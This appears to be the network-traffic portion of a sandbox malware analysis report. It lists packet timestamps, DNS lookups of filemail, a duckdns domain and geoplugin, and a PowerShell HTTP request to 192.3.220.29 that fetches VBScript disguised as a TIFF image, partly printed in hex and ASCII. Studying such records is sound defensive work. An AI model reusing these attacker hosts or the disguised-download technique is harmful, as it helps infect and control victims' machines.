                                                                                                          Nov 20, 2024 17:18:46.493268967 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.493325949 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.493421078 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.494170904 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.494338989 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.494422913 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.495121956 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.495136023 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.495280027 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.496048927 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.496400118 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.496464968 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.496893883 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.497029066 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.497575045 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.497894049 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.498373032 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.498445034 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.498701096 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.498928070 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.499061108 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.499656916 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.503436089 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.503612041 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.504554987 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.504568100 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.504580975 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.504592896 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.504606009 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.504614115 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.504642963 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.504693031 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.504847050 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.505177021 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.505520105 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.505714893 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.506217003 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.506398916 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.506479025 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.507085085 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.547159910 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.652683973 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.652806997 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.652853012 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.652967930 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.653244019 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.653291941 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.653774977 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.654411077 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.654515982 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.654725075 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.655554056 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.655565023 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.655612946 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.655982018 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.656042099 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.656595945 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.656934977 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.656987906 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.657490015 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.657666922 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.657717943 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.658499956 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.658848047 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.658895969 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.659382105 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.659557104 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.659719944 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.660209894 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.660888910 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.660938025 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.661072016 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.661252022 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.661298990 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.662120104 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.662462950 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.662511110 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.663024902 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.663523912 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.663585901 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.663901091 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.664237022 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.664288998 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.664921999 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.664933920 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.664994001 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.665775061 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.665951014 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.666002035 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.666716099 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.666728973 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.666779041 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.667510986 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.667855978 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.667902946 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.668638945 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.668656111 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.668703079 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.669451952 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.669622898 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.669676065 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.670262098 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.670603991 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.670664072 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.671262980 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.671931982 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.671983957 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.672282934 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.672789097 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.672840118 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.673096895 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.673599958 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.673666000 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.673980951 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.674310923 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.674360991 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.674989939 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.675854921 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.675867081 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.675878048 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.675899982 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.675923109 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.676664114 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.677139997 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.677210093 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.677617073 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.677793026 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.677845955 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.678817034 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.678828001 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.678884029 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.679657936 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.680149078 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.680196047 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.680598021 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.681349039 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.681360006 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.681370974 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.681396961 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.681418896 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.682276011 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.682601929 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.682666063 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.683134079 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.683320045 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.683365107 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.683959007 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.685048103 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.685060024 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.685070992 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.685107946 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.685123920 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.685219049 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.685230970 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.685267925 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.685548067 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.687374115 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.687424898 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.687686920 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.688182116 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.688225985 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.688672066 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.688827038 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.688874960 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.689563990 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.689723969 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.689771891 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.690660954 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.690673113 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.690713882 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.690975904 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.690994978 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.691004992 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.691024065 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.691045046 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.691065073 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.691070080 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.691078901 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.691117048 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.691941023 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.692354918 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.692464113 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.692895889 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.692908049 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.692946911 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.693767071 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.694267035 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.694318056 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.694652081 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.695367098 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.695416927 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.695566893 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.695733070 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.695780039 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.696470022 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.696707964 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.696755886 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.766153097 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:47.096534967 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:47.218236923 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:47.218491077 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:47.226675034 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:47.346251011 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:48.401170969 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:48.453341007 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:48.646048069 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:48.652009964 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:48.779814005 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:48.781100035 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:48.961525917 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.186729908 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.188028097 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:49.315246105 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.388600111 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.437740088 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:50.012042999 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:18:50.131658077 CET8049779178.237.33.50192.168.2.7
                                                                                                          Nov 20, 2024 17:18:50.131745100 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:18:50.131928921 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:18:50.254199982 CET8049779178.237.33.50192.168.2.7
                                                                                                          Nov 20, 2024 17:18:51.453716040 CET8049779178.237.33.50192.168.2.7
                                                                                                          Nov 20, 2024 17:18:51.453797102 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:18:51.466353893 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:51.588248968 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:52.454380989 CET8049779178.237.33.50192.168.2.7
                                                                                                          Nov 20, 2024 17:18:52.454447031 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:19:16.579185963 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:19:16.580461025 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:19:16.704333067 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:19:46.577610016 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:19:46.579117060 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:19:46.698832989 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:16.590383053 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:16.591849089 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:20:16.750292063 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:39.813561916 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:40.159356117 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:40.861270905 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:42.360131979 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:45.047817945 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:46.591634035 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:46.593441010 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:20:46.714838028 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:50.360152960 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:21:00.860172987 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:21:16.603799105 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:21:16.605096102 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:21:16.726741076 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:21:46.610817909 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:21:46.614573002 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:21:46.736475945 CET694649773192.3.101.149192.168.2.7

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 20, 2024 17:18:20.615947008 CET5788053192.168.2.71.1.1.1
                                                                                                          Nov 20, 2024 17:18:20.754757881 CET53578801.1.1.1192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.762770891 CET5035753192.168.2.71.1.1.1
                                                                                                          Nov 20, 2024 17:18:47.089551926 CET53503571.1.1.1192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.867156029 CET6458853192.168.2.71.1.1.1
                                                                                                          Nov 20, 2024 17:18:50.008496046 CET53645881.1.1.1192.168.2.7

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Nov 20, 2024 17:18:20.615947008 CET192.168.2.71.1.1.10xe5c5Standard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                          Nov 20, 2024 17:18:46.762770891 CET192.168.2.71.1.1.10xce09Standard query (0)banaya.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Nov 20, 2024 17:18:49.867156029 CET192.168.2.71.1.1.10xcb03Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Nov 20, 2024 17:18:20.754757881 CET1.1.1.1192.168.2.70xe5c5No error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 20, 2024 17:18:20.754757881 CET1.1.1.1192.168.2.70xe5c5No error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                          Nov 20, 2024 17:18:47.089551926 CET1.1.1.1192.168.2.70xce09No error (0)banaya.duckdns.org192.3.101.149A (IP address)IN (0x0001)false
                                                                                                          Nov 20, 2024 17:18:50.008496046 CET1.1.1.1192.168.2.70xcb03No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • 1017.filemail.com
                                                                                                          • 192.3.220.29
                                                                                                          • geoplugin.net

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.749699192.3.220.29807040C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 20, 2024 17:18:13.018316031 CET334OUTGET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                          Host: 192.3.220.29
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 20, 2024 17:18:14.218533993 CET1236INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 20 Nov 2024 16:18:13 GMT
                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                          Last-Modified: Wed, 20 Nov 2024 06:26:54 GMT
                                                                                                          ETag: "22c82-627523c6ee3e7"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 142466
                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: image/tiff
                                                                                                          Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 72 00 65 00 73 00 74 00 69 00 76 00 6f 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 61 00 6d 00 62 00 61 00 72 00 69 00 6e 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 70 00 6e 00 65 00 6f 00 6d 00 65 00 74 00 72 00 69 00 61 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 6f 00 6e 00 74 00 72 00 61 00 6d 00 61 00 72 00 74 00 65 00 6c 00 6f 00 73 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 65 00 73 00 66 00 61 00 6c 00 66 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 73 00 66 00 61 00 6c 00 66 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 61 00 6d 00 62 00 61 00 72 00 69 00 6e 00 6f 00 2c 00 20 00 70 00 6e 00 65 00 6f 00 6d 00 65 00 74 00 72 00 69 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 65 00 [TRUNCATED]
                                                                                                          Data Ascii: Function restivo(ByVal ambarino, ByVal pneometria, ByVal contramartelos) Dim esfalfamento esfalfamento = InStr(ambarino, pneometria) Do While esfalfamento > 0 ambarino = Left(ambarino, esfalfamento - 1) & contramartelos & Mid(ambarino, esfalfamento + Len(pneometria)) esfalfamento = InStr(esfalfamento + Len(contramartelos), ambarino, pneometria) Loop restivo = ambarinoEnd Functionprivate fun
                                                                                                          Nov 20, 2024 17:18:14.218667030 CET1236INData Raw: 00 63 00 74 00 69 00 6f 00 6e 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 28 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74
                                                                                                          Data Ascii: ction ReadStdIn() while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functi
